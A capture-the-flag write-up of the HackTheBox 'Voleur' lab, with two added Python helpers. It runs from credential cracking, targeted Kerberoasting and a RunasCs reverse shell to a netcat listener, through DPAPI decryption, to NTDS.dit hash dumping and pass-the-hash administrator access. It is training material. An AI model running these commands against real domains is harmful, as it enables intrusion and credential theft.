Voleur

The document outlines a penetration testing process on the Voleur box, detailing the use of Kerberos authentication to access various resources and extract sensitive information. Key steps include generating Kerberos tickets, accessing SMB shares, cracking password hashes, and restoring deleted Active Directory users. The process culminates in obtaining both user and root flags through various attacks and exploitation techniques.

Uploaded by Ivo Ponso

IP

10.129.71.253

Domain/Hosts

dc.voleur.htb VOLEUR.HTB

/etc/krb5.conf

[libdefaults]
default_realm = VOLEUR.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true

[realms]
VOLEUR.HTB = {
kdc = 10.129.71.253
admin_server = 10.129.71.253
default_domain = voleur.htb
}

[domain_realm]
.voleur.htb = VOLEUR.HTB
voleur.htb = VOLEUR.HTB

Info

As is common in real life Windows pentests, you will start the Voleur box with credentials for the
following account: ryan.naylor / HollowOct31Nyt

Nmap Results

SMB Enumeration
We generate a Kerberos TGT for user Ryan Naylor using netexec with password authentication;
--generate-tgt writes the ticket to ryan.naylor.ccache

netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --generate-tgt ryan.naylor

We set the Kerberos ticket cache environment variable to use Ryan Naylor’s TGT

export KRB5CCNAME=ryan.naylor.ccache

We verify the current Kerberos ticket

klist

We list available SMB shares on DC.VOLEUR.HTB using netexec with Kerberos authentication

netexec smb DC.VOLEUR.HTB -u ryan.naylor -p 'HollowOct31Nyt' -k --shares

We got some interesting shares

We connect to DC.VOLEUR.HTB using smbclient.py with Kerberos ticket authentication

KRB5CCNAME=ryan.naylor.ccache smbclient.py -k DC.VOLEUR.HTB

use IT
cd First-Line Support
get Access_Review.xlsx

Creds in Access_Review.xlsx

Warning

The Access_Review.xlsx file is protected with a password

We extract the password hash from Access_Review.xlsx using office2john and save it to hash.txt

office2john Access_Review.xlsx >> hash.txt

We crack the extracted password hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

football1 (Access_Review.xlsx) ✅

We create a Python virtual environment, install msoffcrypto-tool

python3 -m venv venv


source venv/bin/activate
pip install msoffcrypto-tool

cd /mnt/NASDF017E/#Kali/HTB/Voleur_HTB

python3 -m msoffcrypto -p football1 Access_Review.xlsx entschluesselt_Access_Review.xlsx

I opened the sheet in https://jumpshare.com/viewer/xlsx (because I had no tool installed to view xlsx files) 😁

🔐 ServiceAccounts passwords in Access_Review.xlsx

User       Password
svc_ldap   M1XyC9pW7qT5Vn
svc_iis    N5pXyV1WqM7CZ8
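Uploading a decrypted credential sheet to a web viewer is something to avoid on a real engagement; the cells can be read on the attack box with nothing but the Python standard library. The script below is an added example, not the writeup's own code: an .xlsx is a zip whose xl/workbook.xml lists the sheets, xl/_rels/workbook.xml.rels maps each sheet's r:id to its part, xl/sharedStrings.xml holds the text of string cells and xl/worksheets/sheetN.xml holds the cells. Given a file path it dumps that workbook; without one it builds a constructed sample workbook with the same User/Password layout (the sheet name ServiceAccounts and the helper names are my assumptions, not from the original file).

```python
"""Dump every cell of every worksheet in an .xlsx, standard library only.
Added example, not from the writeup."""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

M = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
REL = "http://schemas.openxmlformats.org/package/2006/relationships"
NS = {"m": M, "r": R}


def _shared_strings(zf):
    if "xl/sharedStrings.xml" not in zf.namelist():
        return []
    root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    # a rich-text <si> splits its text over several <t> runs; join them
    return ["".join(t.text or "" for t in si.iter(f"{{{M}}}t"))
            for si in root.findall("m:si", NS)]


def _sheet_parts(zf):
    """[(sheet name, zip member)] in workbook order, resolved via the rels."""
    rels = ET.fromstring(zf.read("xl/_rels/workbook.xml.rels"))
    target_by_id = {}
    for rel in rels.findall(f"{{{REL}}}Relationship"):
        target = rel.get("Target").lstrip("/")
        target_by_id[rel.get("Id")] = target if target.startswith("xl/") else "xl/" + target
    wb = ET.fromstring(zf.read("xl/workbook.xml"))
    return [(s.get("name"), target_by_id[s.get(f"{{{R}}}id")])
            for s in wb.findall("m:sheets/m:sheet", NS)]


def dump_xlsx(data):
    """Return {sheet name: [(cell ref, value), ...]} for xlsx file bytes."""
    result = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        strings = _shared_strings(zf)
        for name, part in _sheet_parts(zf):
            cells = []
            for c in ET.fromstring(zf.read(part)).iter(f"{{{M}}}c"):
                v = c.find("m:v", NS)
                if c.get("t") == "s" and v is not None:
                    value = strings[int(v.text)]          # shared string
                elif c.get("t") == "inlineStr":
                    value = "".join(t.text or "" for t in c.iter(f"{{{M}}}t"))
                elif v is not None:
                    value = v.text                        # number, bool or cached formula result
                else:
                    continue                              # empty cell
                cells.append((c.get("r"), value))
            result[name] = cells
    return result


# Constructed sample with the shape of the sheet in the writeup (test input only).
SAMPLE_ROWS = [("User", "Password"),
               ("svc_ldap", "M1XyC9pW7qT5Vn"),
               ("svc_iis", "N5pXyV1WqM7CZ8")]


def build_sample_xlsx(rows=SAMPLE_ROWS, sheet_name="ServiceAccounts"):
    """Write a minimal single-sheet workbook (columns A..Z only) to bytes."""
    strings = []

    def idx(s):
        if s not in strings:
            strings.append(s)
        return strings.index(s)

    row_xml = "".join(
        f'<row r="{r}">' + "".join(f'<c r="{chr(65 + i)}{r}" t="s"><v>{idx(v)}</v></c>'
                                   for i, v in enumerate(row)) + "</row>"
        for r, row in enumerate(rows, start=1))
    parts = {
        "xl/workbook.xml": f'<workbook xmlns="{M}" xmlns:r="{R}"><sheets>'
                           f'<sheet name="{escape(sheet_name)}" sheetId="1" r:id="rId1"/></sheets></workbook>',
        "xl/_rels/workbook.xml.rels": f'<Relationships xmlns="{REL}">'
                           f'<Relationship Id="rId1" Type="{R}/worksheet" Target="worksheets/sheet1.xml"/>'
                           f'<Relationship Id="rId2" Type="{R}/sharedStrings" Target="sharedStrings.xml"/>'
                           '</Relationships>',
        "xl/worksheets/sheet1.xml": f'<worksheet xmlns="{M}"><sheetData>{row_xml}</sheetData></worksheet>',
        "xl/sharedStrings.xml": f'<sst xmlns="{M}">'
                           + "".join(f"<si><t>{escape(s)}</t></si>" for s in strings) + "</sst>",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for member, xml in parts.items():
            zf.writestr(member, xml)
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_xlsx()
    for sheet, cells in dump_xlsx(data).items():
        print(f"== {sheet}")
        for ref, value in cells:
            print(f"{ref}\t{value}")
```

Run it as `python3 dump_xlsx.py entschluesselt_Access_Review.xlsx` on the decrypted copy (it does not handle the password layer itself, msoffcrypto already removed it). Formula cells show their cached result, which is what a credential sheet would contain anyway.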

Important

We obtain a hint that the deleted user Todd.Wolfe had the password NightT1meP1dg3on14

Attack Chain
We run bloodhound-python with Ryan Naylor's credentials to collect all Active Directory data from
the VOLEUR.HTB domain, using Kerberos and outputting a zipped report

bloodhound-python -u ryan.naylor -p 'HollowOct31Nyt' -c All -d VOLEUR.HTB -ns 10.129.71.253 --zip -k

➡️ svc_ldap has GenericWrite on lacey.miller and WriteSPN on svc_winrm. WriteSPN lets svc_ldap set a
servicePrincipalName on svc_winrm and then request a service ticket for it, i.e. a targeted Kerberoast
of that account.

We generate a Kerberos TGT for svc_ldap on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u svc_ldap -p 'M1XyC9pW7qT5Vn' -k --generate-tgt svc_ldap

We set the Kerberos ticket cache environment variable to use svc_ldap’s TGT

export KRB5CCNAME=svc_ldap.ccache

We perform a targeted Kerberoast attack using the svc_ldap account with Kerberos authentication
against dc.voleur.htb

targetedKerberoast.py -k --dc-host dc.voleur.htb -u svc_ldap -d voleur.htb -o hashes_kerberos.txt

We crack Kerberos password hashes using John the Ripper with the RockYou wordlist

john --wordlist=/usr/share/wordlists/rockyou.txt hashes_kerberos.txt

Only the hash for svc_winrm cracks

We generate a Kerberos TGT for svc_winrm on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u svc_winrm -p 'AFireInsidedeOzarctica980219afi' -k --generate-tgt svc_winrm

We set the Kerberos ticket cache environment variable to use svc_winrm’s TGT

export KRB5CCNAME=svc_winrm.ccache

We connect to dc.voleur.htb using evil-winrm with Kerberos authentication as svc_winrm

evil-winrm -i dc.voleur.htb -k -u svc_winrm -r VOLEUR.HTB

User Flag 🏁
We got the User Flag

type C:\Users\svc_winrm\Desktop\user.txt

Restore User todd.wolfe


svc_ldap is in the RESTORE_USERS group, so I think it can restore the user todd.wolfe

We create a tools directory on the target and upload RunasCs.exe to it

mkdir C:\tools
cd C:\tools

upload RunasCs.exe

Start a listener

nc -lvnp 4444

.\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn cmd.exe -r 10.10.16.xx:4444

We got a shell as svc_ldap

Switch to Powershell

powershell

We query Active Directory for all deleted user objects, retrieving their ObjectGUIDs, SIDs and last
known parent OUs

Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects `
    -Properties objectSid, lastKnownParent, ObjectGUID |
    Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List

We restore the deleted Active Directory object with the specified ObjectGUID

Restore-ADObject -Identity '1c6b1deb-c372-4cbb-87b1-15031de169db'

We confirm that todd.wolfe is back

net user /domain

IT Share second-line
We generate a Kerberos TGT for todd.wolfe on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u todd.wolfe -p 'NightT1meP1dg3on14' -k --generate-tgt todd.wolfe

We set the Kerberos ticket cache environment variable to use todd.wolfe’s TGT

export KRB5CCNAME=todd.wolfe.ccache

We connect to DC.VOLEUR.HTB using smbclient.py with Kerberos ticket authentication for todd.wolfe

KRB5CCNAME=todd.wolfe.ccache smbclient.py -k DC.VOLEUR.HTB

We download credential and DPAPI masterkey files from Todd Wolfe's archived user profile via
SMB

mget /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3

mget /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88

We decrypt Todd Wolfe’s DPAPI masterkey file using dpapi.py with his SID and password

dpapi.py masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14

We decrypt Todd Wolfe’s DPAPI credential file using dpapi.py with the extracted masterkey

dpapi.py credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83

Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
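The Protect folder of a profile usually holds more than one master key, and dpapi.py can only decrypt a credential blob with the key it was sealed under. Which one that is can be read straight out of the blob header before anything is downloaded or decrypted. The following is an added example, not the writeup's code and not part of impacket; the struct layouts follow impacket's CREDENTIAL_FILE and DPAPI_BLOB definitions, the provider GUID is the constant Windows writes into every DPAPI blob, and the sample file it builds for the demonstration is constructed (correct headers around a zeroed payload, no real secret).

```python
"""Find the DPAPI master key GUID a protected file was sealed with, so the
right Protect/<SID>/<GUID> file is fetched before running dpapi.py.
Added example, not part of the writeup or of impacket.  Layouts (little-endian):
  CREDENTIAL_FILE: Version(4) Size(4) Unknown(4) Data(Size bytes, a DPAPI_BLOB)
  DPAPI_BLOB:      Version(4) GuidCredential(16) MasterKeyVersion(4)
                   GuidMasterKey(16) Flags(4) ... description, algs, salt, ciphertext"""
import struct
import sys
import uuid

# Provider GUID Windows writes into every DPAPI blob header
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def masterkey_guid_from_blob(blob):
    """Master key GUID (as text) from a raw DPAPI_BLOB."""
    if len(blob) < 44:
        raise ValueError("too short to be a DPAPI blob")
    version, = struct.unpack_from("<I", blob, 0)
    provider = uuid.UUID(bytes_le=bytes(blob[4:20]))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError(f"not a DPAPI blob (version {version}, provider {provider})")
    # bytes 20:24 hold the master key version; the GUID follows in Windows'
    # mixed-endian layout, which is exactly what uuid's bytes_le expects
    return str(uuid.UUID(bytes_le=bytes(blob[24:40])))


def masterkey_guid_from_credential_file(data):
    """Files under AppData/Roaming/Microsoft/Credentials/ wrap the blob in a
    12-byte CREDENTIAL_FILE header."""
    _version, size, _unknown = struct.unpack_from("<III", data, 0)
    blob = data[12:12 + size]
    if len(blob) != size:
        raise ValueError("truncated credential file")
    return masterkey_guid_from_blob(blob)


def masterkey_guid(data):
    """Auto-detect raw blob vs credential file by where the provider GUID sits."""
    if data[4:20] == DPAPI_PROVIDER_GUID.bytes_le:
        return masterkey_guid_from_blob(data)
    if data[16:32] == DPAPI_PROVIDER_GUID.bytes_le:
        return masterkey_guid_from_credential_file(data)
    raise ValueError("no DPAPI provider GUID at offset 4 or 16")


def masterkey_path(sid, guid):
    """Relative path of the matching master key file inside the user's profile."""
    return f"AppData/Roaming/Microsoft/Protect/{sid}/{guid}"


def build_sample_credential_file(masterkey_guid_str):
    """Constructed test vector: correct CREDENTIAL_FILE/DPAPI_BLOB headers around
    a zeroed payload.  It holds no real secret and cannot be decrypted."""
    guid = uuid.UUID(masterkey_guid_str)
    blob = (struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
            + struct.pack("<I", 1) + guid.bytes_le
            + struct.pack("<I", 0) + b"\x00" * 32)
    return struct.pack("<III", 1, len(blob), 0) + blob


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} <credential or blob file> <user SID>")
    guid = masterkey_guid(open(sys.argv[1], "rb").read())
    print(f"master key GUID: {guid}")
    print(f"fetch:           {masterkey_path(sys.argv[2], guid)}")
```

Run it on the downloaded 772275FAD58525253490A9B0039791D3 with Todd Wolfe's SID and it prints the Protect path to pull next; the same header check also tells you immediately when a file is not a DPAPI blob at all (the provider GUID is missing).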

IT Share Third-Line
We generate a Kerberos TGT for jeremy.combs on DC.VOLEUR.HTB using netexec with password
authentication

netexec smb DC.VOLEUR.HTB -u jeremy.combs -p 'qT3V9pLXyN7W4m' -k --generate-tgt jeremy.combs

We set the Kerberos ticket cache environment variable to use jeremy.combs's TGT

export KRB5CCNAME=jeremy.combs.ccache

We connect to DC.VOLEUR.HTB using smbclient.py with Kerberos ticket authentication for jeremy.combs

KRB5CCNAME=jeremy.combs.ccache smbclient.py -k DC.VOLEUR.HTB

We download the id_rsa private SSH key and the Note.txt file from the "Third-Line Support" SMB
share directory

mget /Third-Line Support/id_rsa


mget /Third-Line Support/Note.txt.txt

SSH Shell as svc_backup


Note.txt.txt

The Admin is frustrated with Windows Backup and has partially configured WSL (Windows
Subsystem for Linux) to explore using Linux-based backup tools instead. They asked Jeremy to set
it up further.

Since this is about backup jobs, we will test SSH access using the svc_backup account.

We set strict permissions on the id_rsa SSH private key file using chmod 600

chmod 600 id_rsa

We connect via SSH to voleur.htb as svc_backup on port 2222 using the downloaded id_rsa
private key

ssh svc_backup@voleur.htb -p 2222 -i id_rsa

We list the contents of the Active Directory and registry backup folders within the Third-Line Support
Backups directory
(While connected as jeremy.combs , the folder was not visible due to permission restrictions)

ls '/mnt/c/IT/Third-Line Support/Backups/Active Directory'


ls '/mnt/c/IT/Third-Line Support/Backups/registry'

We securely copy all files from the Active Directory and registry backup directories on voleur.htb
to the local machine using SCP with the id_rsa key on port 2222

scp -P 2222 -i id_rsa svc_backup@voleur.htb:/mnt/c/IT/Third-Line\ Support/Backups/Active\ Directory/* ./ && \
scp -P 2222 -i id_rsa svc_backup@voleur.htb:/mnt/c/IT/Third-Line\ Support/Backups/registry/* ./

NTDS Attack
We extract Active Directory user hashes from the local SYSTEM and NTDS.dit files using
secretsdump.py

secretsdump.py -system SYSTEM -ntds ntds.dit LOCAL

We request a Kerberos TGT for the administrator account in voleur.htb using the NTLM hash with
getTGT.py

getTGT.py -hashes :e656e07c56d831611bxxxxxb259ad2 -dc-ip 10.129.71.253 voleur.htb/administrator

We set the Kerberos ticket cache environment variable to use the administrator’s TGT

export KRB5CCNAME=administrator.ccache

We connect to dc.voleur.htb using evil-winrm with Kerberos authentication as administrator

evil-winrm -i dc.voleur.htb -k -u administrator -r VOLEUR.HTB

Root Flag 🏁
We got the Root Flag 🏁💪

type C:\Users\Administrator\Desktop\root.txt

By 2ubZ3r0
